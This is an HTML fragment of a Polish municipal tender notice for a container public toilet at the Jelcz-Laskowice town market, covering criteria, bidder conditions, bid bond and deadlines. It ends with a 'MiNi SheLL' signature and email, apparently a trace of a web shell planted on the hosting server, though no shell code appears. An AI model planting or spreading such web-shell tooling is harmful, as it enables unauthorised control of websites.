class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamówienia te będą polegały na powtórzeniu tego samego rodzaju robót budowlanych na terenie miasta I gminy Jelcz-Laskowice w wysokości ok. 50% wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriach:<br/>„ Cena ofertowa brutto” – C;<br/>„Gwarancja” – G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej<br/>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej, jeżeli wykaże minimalne poziomy zdolności:<br/>1) w ciągu ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał (zakończył):<br/>a) co najmniej dwie roboty budowlane obejmujące budowę, rozbudowę lub przebudowę budynku wraz z instalacjami sanitarnymi oraz elektrycznymi o wartości nie mniejszej niż 300 000,00 złotych (z podatkiem VAT) łącznie.<br/>2) dysponuje lub będzie dysponował osobami:<br/>a) jedną osobą na stanowisko kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w w specjalności konstrukcyjno-budowlanej bez ograniczeń,<br/>b) jedną osoba posiadająca uprawnienia do kierowania robotami budowlanymi w branży Instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.<br/>c) jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych,<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2 - zgodnie z Załącznikiem nr 3B do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>2) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, złożone według wzoru stanowiącego Załącznik Nr 4 do<br/>SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)wykaz<br/>robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te<br/>roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane<br/>zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty- załącznik nr 6 do<br/>SWZ;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 9 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>5.000,00 PLN (słownie: pięć tysięcy złotych)<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku BS Oława Oddz. Jelcz-Laskowice 39 9585 0007 0020 0209 7563 0002 z dopiskiem “„Wadium w postępowaniu na Przebudowa targowiska miejskiego - budowa kontenerowej toalety publicznej na terenie targowiska miejskiego w Jelczu-Laskowicach”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania na rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP<br/>2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Jelcz-Laskowice<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 8 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 8 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/jelcz_laskowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-12 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-06-10</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com